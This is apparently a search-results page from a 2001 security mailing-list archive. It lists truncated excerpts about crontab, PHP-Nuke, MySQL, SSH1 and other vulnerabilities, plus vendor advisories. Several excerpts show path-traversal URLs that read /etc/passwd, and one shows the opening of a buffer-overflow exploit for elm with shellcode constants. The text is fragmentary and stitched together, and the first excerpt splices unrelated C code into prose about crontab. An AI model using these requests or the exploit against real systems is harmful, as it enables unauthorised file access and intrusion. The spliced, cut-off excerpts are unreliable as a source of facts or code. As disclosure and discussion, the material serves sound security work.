On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> When crontab has determined the name of the user calling crontab (using
> getpwuid()),
> the login name is stored in a 20 byte buffer using the strcpy() function
> (which does no bounds checking). 'useradd' (the utility used to add users
> 1){
> 2) static time_t last_kill_time = 0;
> 3) if (time(NULL) - last_kill_time > 60 && getppid() != 1)
> 4){
> 5) last_kill_time = time(NULL);
> 6) kill(SIGALRM, getppid());
> 7) }
> 8) fatal("Bad result from rsa_private_decrypt");
> 9)}
>
>
On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> the login name is stored in a 20 byte buffer using the strcpy() function
> (which does no bounds checking). 'useradd' (the utility used to add users
> to the system)
> however allows usernames of over 20 characters (32 at most on my dist
-- Forwarded message --
Date: Tue, 13 Feb 2001 03:53:58 -0800 (PST)
From: IT Resource Center <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: security bulletins digest
HP Support Information Digests
==
>When crontab has determined the name of the user calling crontab (using
>getpwuid()),
>the login name is stored in a 20 byte buffer using the strcpy() function
>(which does no bounds checking). 'useradd' (the utility used to add users
>to the system)
>however allows usernames of over 20 character
-/ RFP2101 /---/ rfp.labs / wiretrip/
RFPlutonium to fuel your PHP-Nuke
SQL hacking user logins in PHP-Nuke web portal
/ rain forest puppy / [EMAIL PROTECTED]
Table of contents:
-/ 1 / St
On Mon, 12 Feb 2001, Peter van Dijk wrote:
> The author obviously doesn't care about security.
He's not, and he makes it perfectly clear in the installation
instructions:
"3) In order to use the File Manager, please be sure to chmod 666 ALL
files and 777 ALL directories.
4) Also, to activate H
Follows are details of a vunerability I recently discovered in W3.ORGS
sendtemp.pl.
Name: sendtemp.pl (W3C).
Remote: Yes
Local: Yes
Type:
sendtemp.pl: A part of the Amaya Web development server contains a file
disclosure vulnerability,
which allows remote, read access to files on the servers fi
On Monday 12 February 2001 18:22, you wrote:
> - Original Message -
> From: "Joao Gouveia" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, February 09, 2001 9:54 PM
> Subject: Some more MySql security issues
>
> > Hi,
> >
> > MySql staff has been notified regarding this issu
Hello,
I done others tests...and didn't work here again in my 3 Server
linux...look:
http://192.168.151.100/../../../../../../../../../../etc/passwd
http://192.168.151.150/../../../../../../../../../../etc/passwd
http://192.168.151.1/../../../../../../../../../../etc/passwd
All return me this me
At 03:19 PM 2/12/2001, Konrad Rieck wrote:
>A bof is a bof. You are completely right, but as I said and I still believe
>so, most buffer overflows are just bad coding practice. Don't get confused
>by all that hype, there are far more applications with buffer overflows
>in argv that are definitely
SECURITY ADVISORY 13th February 2001
--
Program: analog (logfile analysis program)
Versions: all versions except 4.16 and 4.90beta3
Operating systems: all
-
Hi,
I'm the person responsible for maintaining Apache JServ (which is actually a
product that is not being developed further as a result of being deprecated
in favor of Tomcat and Jasper) and I like to just clarify that this problem
is strictly within Oracle's product and not within Apache JServ
>> [users getting out of sync and passwords getting logged]
>Not always. I can think of one Windows SSH client off the top of my head
>that will prompt for the username and password seperately - SecureCRT. I'm
>sure there are others as well that I'm just not thinking of right now...
Well, th
- Original Message -
From: "Konrad Rieck" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, February 12, 2001 9:19 PM
Subject: Re: Some more MySql security issues
> Maybe you can explain, how I will change my privileges on a system, when
> executing exactly such overflows, I can'
-BEGIN PGP SIGNED MESSAGE-
=
FreeBSD-SA-01:24 Security Advisory
FreeBSD, Inc.
Topic: SSH1 impleme
I have just tried this with WebSpirs 3.1
The URL I tried is..
http://www.targethost.com/spirs/webspirs.cgi?sp.nextform=../../../../../etc/passwd
It worked.. I also tried this with WebSpirs 4.2 and it did NOT work.. I have not tried
WebSpirs 4.3 yet.. Maybe it is cause you have it in your cgi-bin
Solution for Potential Vulnerability in Granting FilePermission to
Oracle Java Virtual Machine
Versions Affected
Oracle8i Release 3 (8.1.7)
Oracle Application Server 9iAS Release 1.0.2.0.1
Platforms Affected
All
Description of the Problem
A potential vulnerability in Oracle JVM has been discove
Hi,
MySql version 3.23.33 has been released, addressing this latest problems.
Change log in http://www.mysql.com/doc/N/e/News-3.23.33.html
Fixed buffer overrun in libmysqlclient library. Fixed bug in handling STOP
event after ROTATE event in replication.
Fixed another buffer overrun in DROP DATA
The newly announced FreSSH, when there is no /dev/urandom available,
uses a `fallback' to seed its PRNG that consists of:
int numfs, whichfs = 0;
struct statfs *mntbuf;
numfs = getmntinfo(&mntbuf, MNT_NOWAIT);
SIRC Incident Headline: Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Affected Components:
Symantec pcAnywhere 9.0 and earlier
Incident Details:
On 02/11/01 05:22 PM, Zoa Chien of Securax.org reported a denial of service
in Symantec's pcAnywhere 9.0 in which pcAnywhere, configured as a host PC
Hi
Trustix has made available security updates for Trustix secure linux.
kernel:
Trustix specific: no
Distribution versions: All
A race condition in ptrace allows a malicious user to gain root. A
signedness error in the sysctl interface also potentially allows a user
to gain root.
proftpd:
Tru
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Greets.
This problem is known and fixed by the author and a patched
opendir.php file have been made availible for download from the
phpnuke home site.
phpnuke home: http://www.phpnuke.org/
Patched opendir.php:
http://www.phpnuke.org/download.php?op=
You are so right!! Must have been very late or something...
I've checked whether it actually works...nope!
Crontab doesn't get more than 20 chars but somehow it copies them twice?
Strange
Mark
Mate Wierdl <[EMAIL PROTECTED]> wrote on 13-2-01 18:23:10:
>
>On Mon, Feb 12, 2001 at 10:14:00PM +0100,
this is a just a proof of concept, i haven't included setgid call in the
shellcode:
/***
-
elm253-exploit.c
-
***/
#include
#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xba64
unsigned long dame_sp() {
__asm__("movl %esp,%eax");
* Andrew Brown <[EMAIL PROTECTED]> [010213 14:38] wrote:
> >When crontab has determined the name of the user calling crontab (using
> >getpwuid()),
> >the login name is stored in a 20 byte buffer using the strcpy() function
> >(which does no bounds checking). 'useradd' (the utility used to add use
On Mon, Feb 12, 2001 at 01:12:02PM -0500, gabriel rosenkoetter wrote:
> On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> > When crontab has determined the name of the user calling crontab (using
> > getpwuid()),
> > the login name is stored in a 20 byte buffer using the strcpy() functio
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
-BEGIN PGP SIGNED MESSAGE-
- --
gabriel rosenkoetter <[EMAIL PROTECTED]> wrote:
> On Sun, Feb 11, 2001 at 12:38:02AM +0100, Flatline wrote:
> > When crontab has determined the name of the user calling crontab (using
> > getpwuid()),
> > the login name is stored in a 20 byte buffer using the strcpy() function
> > (which does no b
On Tue, Feb 13, 2001 at 03:54:00PM -0500, Alan DeKok wrote:
> I find this attitude amazing. You don't understand why other people
> would want to have usernames longer than 8 characters, so you're
> willing to blame *their* systems for security problems when insecure
> applications are executed
Hello,
In light of the recent posts to bugtraq concerning the
CORE SDI advisory that describes the SSH1 session
key recovery vulnerability a few things needs to be
noted:
- CORE SDI does not provide support services to
SSH1 and does not maintain its source tree. However,
given the inst
31 matches
Mail list logo